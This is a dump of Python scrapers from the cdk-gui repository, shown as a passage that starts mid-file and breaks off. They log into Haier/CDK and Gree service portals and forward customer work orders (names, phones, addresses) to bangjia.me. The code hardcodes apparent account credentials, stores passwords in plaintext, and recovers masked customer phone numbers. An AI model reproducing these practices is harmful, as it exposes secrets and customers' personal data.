\"\"\"加载网单页面\"\"\"\n url = self.baseurl + \"/cdkwd/index2?moduleCode=02&token=\" + self.cookies['token']\n header = self.headers\n del header['Content-Type']\n header[\n 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n header['Referer'] = self.baseurl + \"/manager-web/index.do?token=\" + self.cookies['token']\n header['Upgrade-Insecure-Requests'] = \"1\"\n response = self.session.get(url, headers=header)\n soup = self.getsoup(response)\n # print(soup)\n haierSpan = soup.find('div', text=re.compile('网单全流程'))\n print(\"+++++++++++++++++++++++++++++++loadWangdan\")\n print(haierSpan)\n if not haierSpan:\n return False\n netorder = {'0': url,\n # '1': self.baseurl + soup.find('div', text=re.compile('维修单'))['href'],\n # '2': self.baseurl + soup.find('div', text=re.compile('安装单'))['href'],\n # '3': self.baseurl + soup.find('div', text=re.compile('鸿合维修单'))['href'],\n # '4': self.baseurl + soup.find('div', text=re.compile('清洁保养'))['href']\n '5': self.baseurl + soup.find('div', text=re.compile('网单全流程'))['href']\n }\n # 1: 表示维修 2 表示安装 3 表示鸿合维修单 4 表示清洁保养\"\"\" 5 表示全流程\n return netorder\n\n def loadNetworkOrder(self, netorder, ordertype=2):\n \"\"\":ordertype = 5:所有网单 1: 表示维修 2 表示安装 3 表示鸿合维修单 4 表示清洁保养\"\"\"\n api_path = netorder[str(ordertype)]\n # print(\"***********************************loadNetworkOrder,url={}\".format(apiPath))\n header = self.headers\n header['Referer'] = netorder['0']\n self.session.get(api_path, headers=header)\n header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n header[\n 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n header['X-Requested-With'] = \"XMLHttpRequest\"\n header['Accept-Encoding'] = \"gzip, deflate\"\n header['Referer'] = api_path\n header['Upgrade-Insecure-Requests'] = '1'\n header['Cache-Control'] = 'max-age=0'\n\n apiPath = '/cdkwd/azdOrder/azdOrderList'\n if ordertype == 1:\n apiPath = '/cdkwd/repairOrder/repairOrderList'\n elif ordertype == 3:\n apiPath = '/cdkwd/wxRepairOrder/repairOrderList'\n elif ordertype == 4:\n apiPath = '/cdkwd/byOrder/byOrderList'\n elif ordertype == 5:\n apiPath = '/cdkwd/deliveryOrder/deliveryOrderList'\n\n today = datetime.date.today() # 获得今天的日期\n pageUrl = self.baseurl + apiPath\n pageUrl = pageUrl + \"?orderDateBegin=\" + (today - datetime.timedelta(days=26)).strftime(\n '%Y-%m-%d') + \"&orderDateEnd=\" + datetime.date.today().strftime('%Y-%m-%d')\n pageUrl += \"&orderCode=&orderId=&consignee=&length=150&consigneeMobile=&deliveryDateBegin=&deliveryDateEnd=&branchCodeYw=&orderStatus=&carDriver=&carPhone=&province=&city=®ionCode=&consigneeAddr=&carNo=&oldOrder=&isYy=&serviceArea=&serviceCodeYw=\"\n # params = dict(parse.parse_qsl(parsed_url.query))\n # print(\"pageUrl={}\".format(pageUrl))\n params = {}\n params['draw'] = \"2\" if ordertype == 2 else \"1\" # 1为维修 2为安装\n params['order[0][column]'] = \"2\"\n params['order[0][dir]'] = \"desc\"\n params['start'] = 0\n params['length'] = 150\n orderRes = self.session.get(pageUrl, headers=header)\n orderRes.encoding = 'utf-8'\n # print(\"params=\",params)\n # print(\"headers=\",header)\n # print(\"loadNetworkOrder order result={}\".format(orderRes.text))\n if orderRes.status_code != 200 or not orderRes.text or len(orderRes.text.strip()) <= 0:\n return self.datafail\n orderResult = self.getjson(orderRes)\n if 'recordsTotal' in orderResult and orderResult['recordsTotal'] > 0:\n try:\n order_list = list(self.load_wd_orders(orderResult))\n print(order_list)\n except Exception as e:\n error = self.datafail.copy()\n error['msg'] = str(e)\n return error\n checkRes = requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data={\"data\": json.dumps(order_list)})\n checkRes.encoding = 'utf-8'\n if checkRes and checkRes.status_code == 200:\n print(\"网单同步成功\")\n return self.datasuccess\n return self.datasuccess\n\n def load_wd_orders(self, orderResult): # 加载网单列表\n for r in orderResult['data']:\n description = \"原单号:{},工单方式:{},司机:{}|{},联系人:{}|{}\".format(r['sourceSn'], r['installWayName'] or '',\n r['carDriver'] or '', r['carPhone'] or '',\n r['fhContact'] or '', r['fhMobile'] or '')\n curtime = int(time.time())\n r_time = r['reserveTime'] if r['reserveTime'] else r['deliveryDate'] or str(curtime)\n ordername = r['typeCodeName'] if \"typeCodeName\" in r and r['typeCodeName'] else \"\"\n order_info = {'factorynumber': r['orderId'], 'ordername': ordername,\n 'username': r['consignee'], 'mobile': r['consigneeMobile'],\n 'orderstatus': r['orderStatusName'], 'machinetype': r['add8'],\n 'province': r['province'], 'city': r['city'], 'county': r['region'],\n 'address': r['consigneeAddr'], 'description': r['add12'],\n 'ordertime': str(datetime.datetime.fromtimestamp(int(r['createdDate']) / 1000)),\n 'repairtime': str(datetime.datetime.fromtimestamp(int(r_time) / 1000)),\n 'buydate': str(datetime.datetime.fromtimestamp(int(r['accountDate']) / 1000)),\n 'machinebrand': '海尔', 'version': r['add5'], 'note': description,\n 'companyid': self.factoryid, 'adminid': self.adminid,\n 'originname': r['sourceCodeName'],\n 'branchCodeYw': r['branchCodeYw'], 'serviceCodeYw': r['serviceCodeYw']\n }\n order_info = self.clearAddress(order_info)\n if not self.isNew(order_info, self.bjdomain, self.adminid):\n continue\n yield from self.load_wd_info(order_info)\n\n def load_wd_info(self, info): # 加载网单详情\n info_url = self.baseurl + \"/cdkwd/deliveryOrder/orderInfo?orderId={}&branchCode={}&serviceCode={}\".format(\n info['factorynumber'], info['branchCodeYw'], info['serviceCodeYw'])\n res = self.session.get(info_url, headers=self.headers)\n soup = self.getsoup(res)\n # print(\"load_wd_info result=\", soup)\n m = info['mobile']\n c = m.count('*')\n # print(\"mobile=\", m, \"* count=\", c)\n mobiles = re.findall(re.compile(r'[>]({})[<]'.format(m.replace(\"*\" * c, \"[0-9]{\" + str(c) + \"}\"))), res.text)\n if mobiles and len(mobiles) > 0:\n mobile = mobiles[0]\n info['mobile'] = mobile.split('-')[0]\n info['description'] = \"收货人手机:\" + mobile\n machines = soup.find(\"tbody\").find('tr').find_all('td')\n if machines and len(machines) > 5:\n info['machinebrand'] = machines[0].text.strip()\n info['machinetype'] = machines[1].text.strip()\n info['version'] = machines[5].text.strip().replace(info['machinebrand'], '').replace(info['machinetype'], \"\")\n info['sn'] = machines[4].text.strip()\n yield info\n\n def loadHaierOrder(self):\n pageUrl = self.azbaseurl + '/api/businessData/serviceList/selectServiceDealList'\n # print(\"***********************************loadHaierOrder,pageUrl=\" + pageUrl)\n params = {}\n today = datetime.date.today() # 获得今天的日期\n params['jobStatus'] = '1#3' # 只需要一种未派人状态 空则为全部, 1#3#4#5\n params['regTimeStart'] = (today - datetime.timedelta(days=3)).strftime('%Y-%m-%d %H:%M:%S')\n params['regTimeEnd'] = (today + datetime.timedelta(days=1)).strftime('%Y-%m-%d %H:%M:%S')\n params['pageIndex'] = 1\n params['rows'] = 50\n params['token'] = self.cookies['token']\n header = self.headers.copy()\n header['Referer'] = 'http://cdkaz.rrs.com/pages/cdkinstall/serveprocess'\n params = json.dumps(params)\n header['Content-Length'] = str(len(params))\n header['Host'] = self.azhost\n header['Origin'] = self.azbaseurl\n # print(\"loadHaierOrder params:\")\n # print(\"params=\", params)\n # print(\"header=\", header)\n # print(\"pageUrl=\", pageUrl)\n orderRes = self.session.post(pageUrl, data=params, headers=header)\n # print(orderRes.text)\n orderResult = self.getjson(orderRes)\n if orderRes.status_code == 200 and 'success' in orderResult and orderResult['success'] and orderResult['data'] \\\n and 'records' in orderResult['data'] and orderResult['data']['records']:\n data = orderResult['data']\n records = data['records']\n pageCount = data['pageCount']\n pageSize = data['pageSize']\n rowCount = data['rowCount']\n firstResult = data['firstResult']\n # print(len(records))\n print('pageCount=%s,pageSize=%s,rowCount=%s,firstResult=%s' % (pageCount, pageSize, rowCount, firstResult))\n order_list = []\n try:\n for record in records:\n ordername = record['orderFlagcode'] if record['orderFlagcode'] else \"\"\n order_info = {'factorynumber': record['woId'], 'ordername': ordername,\n 'username': record['customerName'], 'mobile': record['customerPhone'],\n 'orderstatus': '待派单', 'machinetype': record['productName'],\n 'address': record['address'], 'ordertime': record['assignDate'],\n 'repairtime': record['serviceDate'], 'description': record['reflectSituation'],\n 'version': record['modelName'], 'sn': record['model'],\n 'companyid': self.factoryid, 'machinebrand': '海尔', 'originname': 'CDK',\n 'adminid': self.adminid}\n order_list.append(order_info)\n except Exception as e:\n print(order_list)\n error = self.datafail.copy()\n error['msg'] = str(e)\n return error\n checkRes = requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data={\"data\": json.dumps(order_list)})\n checkRes.encoding = 'utf-8'\n\n if checkRes and checkRes.status_code == 200:\n print(\"海尔工单同步成功\")\n return self.datasuccess\n return self.datasuccess\n\n\nif __name__ == '__main__':\n util = CDKCookieUtil('66004185', 'Dw147259', adminid='24', factoryid='18')\n print(util.loadOrders())\n"
},
{
"alpha_fraction": 0.5603408813476562,
"alphanum_fraction": 0.576022744178772,
"avg_line_length": 48.162010192871094,
"blob_id": "c80296ee6424159d029a4bb0d4330cd8d6606320",
"content_id": "8255c33e1c4baafc75b0fa335243c87544941221",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9048,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 179,
"path": "/GreeUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import json\nfrom datetime import date, timedelta\nfrom urllib.parse import urlparse, urlencode, unquote\n\nimport requests\n\nfrom Util import Util\n\n\nclass GreeUtil(Util):\n def __init__(self, username, passwd, adminid='15870', factoryid='1', baseurl='http://116.6.118.169:7909',\n bjdomain='http://fatest.bangjia.me'):\n parsed_uri = urlparse(baseurl)\n self.host = parsed_uri.netloc\n self.username = username\n self.passwd = passwd\n self.baseurl = baseurl\n self.adminid = adminid\n self.factoryid = factoryid\n self.bjdomain = bjdomain\n self.loginurl = self.baseurl + \"/hjzx/loginAction_login\"\n self.mainurl = self.loginurl\n self.searchurl = self.baseurl + '/hjzx/afterservice/afterservice!api.action'\n self.session = requests.Session()\n self.agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \\\n 'Chrome/81.0.4044.113 Safari/537.36'\n self.datasuccess = {'code': 1, 'msg': '抓单成功', 'element': ''}\n self.datafail = {'code': 0, 'msg': '抓单失败,请确认账号密码是否正确'}\n self.headers = {'Content-Type': 'application/x-www-form-urlencoded',\n 'User-Agent': self.agent,\n 'Upgrade-Insecure-Requests': '1', 'Host': self.host, 'Referer': self.baseurl,\n 'Origin': parsed_uri.scheme + \"://\" + parsed_uri.netloc,\n 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,'\n '*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'}\n\n def isLogin(self):\n response = self.session.get(self.loginurl, headers=self.headers)\n response.encoding = 'utf-8'\n # print(response.status_code)\n # print(\"isLogin response={}\".format(response.text))\n return \"新派工系统-->主界面\" in response.text\n\n def login(self):\n data = {\"usid\": self.username, \"pswd\": self.passwd, \"loginflag\": \"loginflag\"}\n response = self.session.post(self.loginurl, headers=self.headers, data=urlencode(data))\n response.encoding = 'utf-8'\n # print(\"login result={}\".format(response.text))\n if response.status_code == 200:\n return \"新派工系统-->主界面\" in response.text\n return False\n\n def loadMain(self):\n if not self.isLogin() and not self.login():\n return self.datafail\n headers = self.headers.copy()\n headers['Referer'] = self.baseurl + '/hjzx/menu.jsp'\n # 加载安装工单查询\n url = self.baseurl + \"/hjzx/az/doListLcLsAz?otype=az&xsorsh=1&cd=pgcx\"\n response = self.session.get(url, headers=headers)\n # response.encoding = 'utf-8'\n # print(\"loadMain response={}\".format(response))\n if response.status_code != 200:\n return self.datafail\n # return list(self.search(url))\n try:\n data = {\"data\": json.dumps(list(self.search(url)))}\n # print(\"loadMain data = {}\".format(data))\n result = requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n # print(result.text)\n except Exception as e:\n print(\"addorder failed:\", e)\n return self.datafail\n return self.datasuccess\n\n def search(self, url, page=1, totalcount=0, pagesize=50):\n headers = self.headers.copy()\n headers['Referer'] = url\n today = date.today()\n data = {\"otype\": \"az\", \"xsorsh\": \"1\", \"cd\": \"pgcx\", \"s_azAssign.s_spid\": \"102\", # 商用空调\n \"s_azAssign.s_cjdt_from\": (today).strftime('%Y-%m-%d %H:%M:%S'),\n \"s_azAssign.s_cjdt_to\": (today + timedelta(days=1)).strftime('%Y-%m-%d %H:%M:%S'),\n \"isFirstPage\": \"true\" if page == 1 else \"false\", \"paged\": str(page)\n }\n response = self.session.post(self.baseurl + \"/hjzx/az/doListLcLsAz\", headers=headers, data=urlencode(data))\n bsObj = self.getsoup(response)\n totalcount = int(bsObj.find(\"span\", {\"id\": \"totalRecord\"}).text.strip())\n print(\"search totalcount={}\".format(totalcount))\n # isall = (page + 1) * pagesize >= totalcount\n isall = True\n tbody = bsObj.find(\"table\", {\"id\": \"tbody\"}).find(\"tbody\")\n if isall:\n yield from self.parseOrders(tbody.find_all(\"tr\"))\n else:\n yield from self.parseOrders(tbody.find_all(\"tr\"))\n yield from self.search(url, page + 1, totalcount, pagesize)\n\n def parseOrders(self, trlist):\n for tr in trlist:\n tablecolumns = tr.find_all(\"td\")\n if tr and len(tablecolumns) > 2:\n data = self.parseorder(tablecolumns)\n if data:\n detailUrl = self.baseurl + \"/hjzx/az/\" + tablecolumns[0].find(\"a\")['href']\n data = self.orderdetail(data, detailUrl)\n # print(\"parseorder data={}\".format(data))\n yield data\n\n def parseorder(self, tablecolumns):\n try:\n data = {}\n data['factorynumber'] = tablecolumns[2].text.strip()\n data['username'] = tablecolumns[4].text.strip()\n data['mobile'] = tablecolumns[5].text.strip()\n data['address'] = tablecolumns[6].text.strip()\n data['createname'] = tablecolumns[8].text.strip()\n data['ordertime'] = tablecolumns[9].text.strip() # 创建时间\n data['companyid'] = self.factoryid\n data['machinebrand'] = \"格力\"\n data['machinetype'] = \"商用空调\"\n data['orgname'] = tablecolumns[10].text.strip()\n data['note'] = tablecolumns[12].text.strip()\n data['adminid'] = self.adminid\n data['description'] = \"当前处理网点:{},处理结果跟踪:{},备注:{}\".format(\n tablecolumns[10].text.strip(), tablecolumns[11].text.strip(), tablecolumns[12].text.strip()) # 具体描述\n return data if self.isNew(data) else None\n except Exception as e:\n print(\"parseorder exception\", e)\n return None\n\n def isNew(self, data):\n res = requests.post(self.bjdomain + \"/Api/Climborder/checkexist\",\n data={\"orderno\": data['factorynumber'], 'adminid': self.adminid})\n return self.checkBjRes(res)\n\n def orderdetail(self, data, detailUrl):\n headers = self.headers.copy()\n headers['Referer'] = self.baseurl + \"/hjzx/az/doListLcLsAz\"\n # 加载安装工单查询\n response = self.session.get(detailUrl, headers=headers)\n response.encoding = 'utf-8'\n # print(response.url)\n # print(\"orderdetail response={}\".format(response.text))\n if response.status_code != 200:\n return data\n bsObj = self.getsoup(response)\n # data['mastername'] = tablecolumns[10].text.strip() # 师傅姓名 无法获取\n # data['mastermobile'] = tablecolumns[10].text.strip() # 师傅电话 无法获取\n data['machineversion'] = str(bsObj.find(\"input\", {\"id\": \"jxid0\"})[\"value\"])\n data['buydate'] = str(bsObj.find(\"input\", {\"id\": \"gmrq\"})[\"value\"])\n data['repairtime'] = str(bsObj.find(\"input\", {\"id\": \"yyazsj\"})[\"value\"]) # 上门时间/预约安装时间\n data['orderstatus'] = bsObj.find(\"span\", {\"id\": \"dqpgjd\"}).text.strip()\n data['province'] = self.get_selected(bsObj.find(\"select\", {\"id\": \"sfen\"}))\n data['city'] = self.get_selected(bsObj.find(\"select\", {\"id\": \"cshi\"}))\n data['county'] = self.get_selected(bsObj.find(\"select\", {\"id\": \"xian\"}))\n data['town'] = self.get_selected(bsObj.find(\"select\", {\"id\": \"jied\"}))\n data['address'] = str(bsObj.find(\"input\", {\"id\": \"dizi\"})[\"value\"])\n data['originname'] = self.get_selected(bsObj.find(\"select\", {\"id\": \"xslx\"})) # 销售类型 作为工单来源\n return data\n\n def logout(self):\n url = self.baseurl + \"/hjzx/logout.jsp\"\n self.headers['Referer'] = self.baseurl + '/hjzx/loginAction_login'\n self.session.get(url, headers=self.headers)\n\n\nif __name__ == '__main__':\n bjdomain = 'http://zjgl.bangjia.me'\n account = Util.getAccount(bjdomain)\n # print(account)\n # util = GreeUtil('S91898010070', 'S91898010070', adminid='24', factoryid='1')\n # print(\"loadMain result = {}\".format(util.loadMain()))\n # util.logout()\n if account and 'loginname' in account and 'loginpwd' in account and 'adminid' in account and 'loginurl' in account:\n util = GreeUtil(account['loginname'], account['loginpwd'], adminid=account['adminid'], factoryid=\"10002\",\n baseurl=unquote(account['loginurl']), bjdomain=bjdomain)\n print(\"gree loadMain result = {}\".format(util.loadMain()))\n util.logout()\n"
},
{
"alpha_fraction": 0.6976401209831238,
"alphanum_fraction": 0.7005899548530579,
"avg_line_length": 20.870967864990234,
"blob_id": "e9b76495c3ef1162220f22296391082bf29f653c",
"content_id": "24f7b1d632e15adf5aacc92f1bfce4c2280f60f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 31,
"path": "/aesgcm.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.ciphers import (\n Cipher, algorithms, modes\n)\n\nNONCE_BYTE_SIZE = 12\n\n\ndef encrypt(cipher, plaintext, nonce):\n cipher.mode = modes.GCM(nonce)\n encryptor = cipher.encryptor()\n ciphertext = encryptor.update(plaintext)\n return (cipher, ciphertext, nonce)\n\n\ndef decrypt(cipher, ciphertext, nonce):\n cipher.mode = modes.GCM(nonce)\n decryptor = cipher.decryptor()\n return decryptor.update(ciphertext)\n\n\ndef get_cipher(key):\n cipher = Cipher(\n algorithms.AES(key),\n None,\n backend=default_backend()\n )\n return cipher\n"
},
{
"alpha_fraction": 0.529854953289032,
"alphanum_fraction": 0.5425983667373657,
"avg_line_length": 46.2613639831543,
"blob_id": "6e5cf36d159bfb130b853ace8c6a8cef34c74db6",
"content_id": "8a260d7484c22435e6b5e11e06f6bdac2d60522d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12741,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 264,
"path": "/CDKUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import datetime\nimport json\nimport os\nimport re\nimport random\nimport sys\nfrom urllib import parse\nfrom urllib.parse import urlparse\n\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\n\nfrom bs4 import BeautifulSoup\n\n\n# from useragent import agents\n\n\nclass CDKUtil:\n def __init__(self, username='', passwd='Dw147259', token=None):\n self.baseurl = \"http://cdk.rrs.com\"\n self.mainurl = 'http://cdk.rrs.com/manager-web/index.do'\n self.session = requests.Session()\n # self.agent = random.choice(agents)\n self.agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'\n self.guidStr = CDKUtil.guid()\n self.token = token\n self.orderurl = ''\n self.username = username\n self.passwd = passwd\n\n @staticmethod\n def guid():\n import uuid\n s_uuid = str(uuid.uuid4())\n l_uuid = s_uuid.split('-')\n s_uuid = ''.join(l_uuid)\n s_uuid = s_uuid[:12] + \"4\" + s_uuid[13:]\n return s_uuid\n\n def generateCode(self):\n self.guidStr = CDKUtil.guid()\n # 动态加载验证码图片\n captchaUrl = self.baseurl + \"/login/generateCode?redisKey=\" + self.guidStr\n print(\"generateCode guidStr=%s,captchaUrl=%s\" % (self.guidStr, captchaUrl))\n response = self.session.get(captchaUrl)\n return Image.open(BytesIO(response.content))\n # _code = OCRUtil.getCode(img, config_cdk, tesseract_path)\n # print(\"generateCode captchaUrl: %s ,getCode :%s\" % (captchaUrl, _code))\n\n # 校验验证码\n def checkCode(self, code, name, passwd):\n self.username = name\n self.passwd = passwd\n params = {\"redisKey\": self.guidStr, \"checkCode\": code}\n headers = {'content-type': 'application/json; charset=utf-8', 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': self.agent,\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,pt;q=0.6', 'Connection': 'keep-alive',\n 'Accept': 'image/webp,image/apng,image/*,*/*;q=0.8', 'Host': 'cdk.rrs.com'}\n checkRes = self.session.post(self.baseurl + \"/login/checkCode\", data=json.dumps(params), headers=headers)\n print('=========================checkCode')\n checkResult = json.loads(checkRes.text)\n # print(checkResult)\n\n # 验证码正确\n if checkResult and checkResult['result'] == '1':\n print(\"=========================验证成功\")\n codeFaultTimes = 0\n return self.login(code, name, passwd)\n else:\n # 重新加载图片验证 验证码\n return False\n\n def login(self, code, username, passwd):\n # 校验通过,模拟登陆\n params = {\"loginname\": username, \"loginpwd\": passwd,\n \"returnUrl\": \"http://cdk.rrs.com/manager-web/index.do\", \"checkCode\": code}\n r = self.session.post(self.baseurl + \"/login\", data=params)\n r.encoding = 'utf-8'\n # 登录成功进入主界面\n if r.status_code == 200:\n mainhtml = BeautifulSoup(r.text, features=\"lxml\")\n # print(mainhtml)\n # print(\"=========================\")\n # print(r.headers)\n return self.getHaierUrl(mainhtml)\n # 重定向到location\n elif r.status_code == 302:\n # location = r.headers.getheader('Location')\n location = r.headers['Location']\n if location:\n # testcdk(name=name, passwd=passwd, url=location)\n return False\n # testcdk(name=name, passwd=passwd, url=baseurl + \"/login.html?ReturnUrl=\" + mainurl)\n return False\n\n def getHaierUrl(self, soap):\n # haierSpan = mainhtml.find(\"div\", {\"id\": \"serviceDiv\"}).span\n haierSpan = soap.find('span', text=re.compile('海尔安装'))\n print(\"+++++++++++++++++++++++++++++++getHaierUrl\")\n print(haierSpan)\n if not haierSpan:\n # testcdk(name=name, passwd=passwd, url=mainurl + \"?token=\" + self.token)\n return False\n haierUrl = haierSpan['href']\n return self.loadHaier(haierUrl)\n\n # 加载海尔安装模块\n def loadHaier(self, url):\n session = requests.Session()\n print(\"loadHaier url=\" + url)\n haierMain = session.get(url)\n if haierMain.status_code == 200:\n soap = BeautifulSoup(haierMain.text, features=\"lxml\")\n soap.encoding = 'utf-8'\n # print(soap)\n # 返回3个js polyfills.c38c86ad444630494a92.bundle.js main.4b3d8dea306811e889d6.bundle.js\n # http://cdkaz.rrs.com/inline.1557c7584b9dbbbbbcec.bundle.js\n\n return self.authAndgetMenu(url)\n\n # haierUrl = soap.find('a', text=re.compile('服务处理'))['href']\n # orderMain = loadHaier(session, baseurl + haierUrl)\n # print(orderMain)\n else:\n return False\n\n # url = http://cdkaz.rrs.com/pages/cdkinstall/serveprocess?moduleCode=04&newTopWindow=true&token=168E4C1CDFF64967C3336A8ADF0CDB1B\n def authAndgetMenu(self, url):\n # 请求验证\n auth = 'http://cdkaz.rrs.com//api/system/authMenu/auth'\n parsed_url = urlparse(url)\n print(\"========----------=============\")\n print(parsed_url)\n haierBaseUrl = parsed_url.scheme + \"://\" + parsed_url.netloc\n pageUrl = haierBaseUrl + parsed_url.path\n params = dict(parse.parse_qsl(parsed_url.query))\n self.token = params['token'] # 给全局变量赋值 token\n\n headers = {'content-type': 'application/json; charset=utf-8', 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': self.agent,\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,pt;q=0.6', 'Connection': 'keep-alive',\n 'Accept': 'application/json, text/plain, */*', 'Host': parsed_url.netloc,\n 'Origin': haierBaseUrl}\n checkRes = self.session.post(auth, data=json.dumps(params), headers=headers)\n checkRes.encoding = 'utf-8'\n # print(checkRes.text)\n authResult = json.loads(checkRes.text)\n # {token=168E4C1CDFF64967C3336A8ADF0CDB1B moduleCode=04 userId=''}\n if checkRes.status_code == 200 and authResult['success']:\n menuUrl = 'http://cdkaz.rrs.com//api/system/authMenu/authMenuChanges'\n menuRes = self.session.post(menuUrl, data=json.dumps(params), headers=headers)\n menuRes.encoding = 'utf-8'\n menuResult = json.loads(menuRes.text)\n # print(\"========----------=============\")\n # print(menuRes.text)\n if menuRes.status_code == 200 and menuResult['success']:\n for data in menuResult['data']:\n # print(data)\n # print(\"========\")\n for children in data['children']:\n for childitem in children['children']:\n # print(childitem)\n # print(\"-------\")\n if childitem['text'] == '服务处理':\n self.orderurl = haierBaseUrl + childitem['link'] + \"?\" + str(parse.urlencode(params))\n self.updateUser(self.username, self.passwd, self.orderurl)\n return self.loadHaierOrder()\n return False # 重新登录\n\n def loadHaierOrder(self):\n print(\"loadHaierOrder url=\" + self.orderurl)\n parsed_url = urlparse(self.orderurl)\n apipath = '/api/businessData/serviceList/selectServiceDealList'\n print(\"***********************************\")\n haierBaseUrl = parsed_url.scheme + \"://\" + parsed_url.netloc\n pageUrl = haierBaseUrl + apipath\n params = dict(parse.parse_qsl(parsed_url.query))\n today = datetime.date.today() # 获得今天的日期\n params['jobStatus'] = '1#3' # 只需要一种未派人状态 空则为全部, 1#3#4#5\n params['regTimeStart'] = (today - datetime.timedelta(days=6)).strftime('%Y-%m-%d %H:%M:%S')\n params['regTimeEnd'] = (today + datetime.timedelta(days=1)).strftime('%Y-%m-%d %H:%M:%S')\n params['pageIndex'] = 1\n params['rows'] = 50\n headers = {'content-type': 'application/json',\n 'User-Agent': self.agent,\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,pt;q=0.6', 'Connection': 'keep-alive',\n 'Accept': 'application/json, text/plain, */*', 'Host': parsed_url.netloc,\n 'Origin': haierBaseUrl, 'Referer': self.orderurl}\n params = json.dumps(params)\n headers['Content-Length'] = str(len(params))\n print(\"loadHaierOrder params:\")\n # print(params)\n # print(headers)\n orderRes = self.session.post(pageUrl, data=params, headers=headers)\n orderRes.encoding = 'utf-8'\n # print(orderRes.text)\n orderResult = json.loads(orderRes.text)\n if orderRes.status_code == 200 and orderResult['success'] and orderResult['data']:\n data = orderResult['data']\n records = data['records']\n pageCount = data['pageCount']\n pageSize = data['pageSize']\n rowCount = data['rowCount']\n firstResult = data['firstResult']\n print(len(records))\n print('pageCount=%s,pageSize=%s,rowCount=%s,firstResult=%s' % (pageCount, pageSize, rowCount, firstResult))\n new_datas = {}\n order_list = []\n for record in records:\n ordername = \"安装\" if \"安装\" in record['orderFlagcode'] else \"维修\"\n order_info = {'factorynumber': record['woId'], 'ordername': ordername,\n 'username': record['customerName'], 'mobile': record['customerPhone'],\n 'orderstatus': '待派单', 'machinetype': record['productName'],\n 'address': record['address'], 'ordertime': record['assignDate'],\n 'repairtime': record['serviceDate'], 'description': record['reflectSituation'],\n 'version': record['modelName'], 'sn': record['model'],\n 'companyid': 18, 'machinebrand': '海尔', 'originname': 'CDK', 'adminid': '26073'}\n order_list.append(order_info)\n checkRes = requests.post(\"http://north.bangjia.me/Api/Climborder/addorder\",\n data={\"data\": json.dumps(order_list)})\n checkRes.encoding = 'utf-8'\n\n if checkRes and checkRes.status_code == 200:\n print(\"同步成功\")\n return True\n # for record in records:\n # new_datas[record['woId']] = Order(username=record['customerName'], orderno=record['woId'],\n # originno=record['sourceCode'],\n # mobile=record['customerPhone'], address=record['address'],\n # machineversion=record['modelName'],\n # data=json.dumps(record), token=token, uname=name)\n # for each in Order.query.filter(Order.orderno.in_(new_datas.keys())).all():\n # # Only merge those posts which already exist in the database\n # # data = new_datas.pop(list(new_datas.keys()).index(each.orderno))\n # data = new_datas.pop(each.orderno, None)\n # each.uname = name\n # # print(\"data=\" + str(data))\n # # if data:\n # # print(\"data orderno=\" + data.orderno)\n # # db.session.merge(data)\n #\n # # Only add those posts which did not exist in the database\n # db.session.add_all(new_datas.values())\n #\n # # Now we commit our modifications (merges) and inserts (adds) to the database!\n # db.session.commit()\n return False\n\n def updateUser(self, name, passwd, orderurl):\n userinfo = {\"username\": name, \"passwd\": passwd, \"token\": self.token, 'islogin': True, 'orderurl': orderurl}\n userfile = os.path.join(os.path.split(os.path.abspath(sys.argv[0]))[0], \"file\", \"user.txt\")\n with open(userfile, 'w') as f:\n jsObj = json.dumps(userinfo)\n f.write(jsObj)\n\n\nif __name__ == '__main__':\n # util = JDUtil('24', factoryid='19')\n util = CDKUtil()\n"
},
{
"alpha_fraction": 0.5617203712463379,
"alphanum_fraction": 0.579781711101532,
"avg_line_length": 47.7088623046875,
"blob_id": "fbfac3a609e1f8e0f551e613228990ce268466c7",
"content_id": "6081a390354068b74f67661300279f28ffe943ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7718,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 158,
"path": "/MideaUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
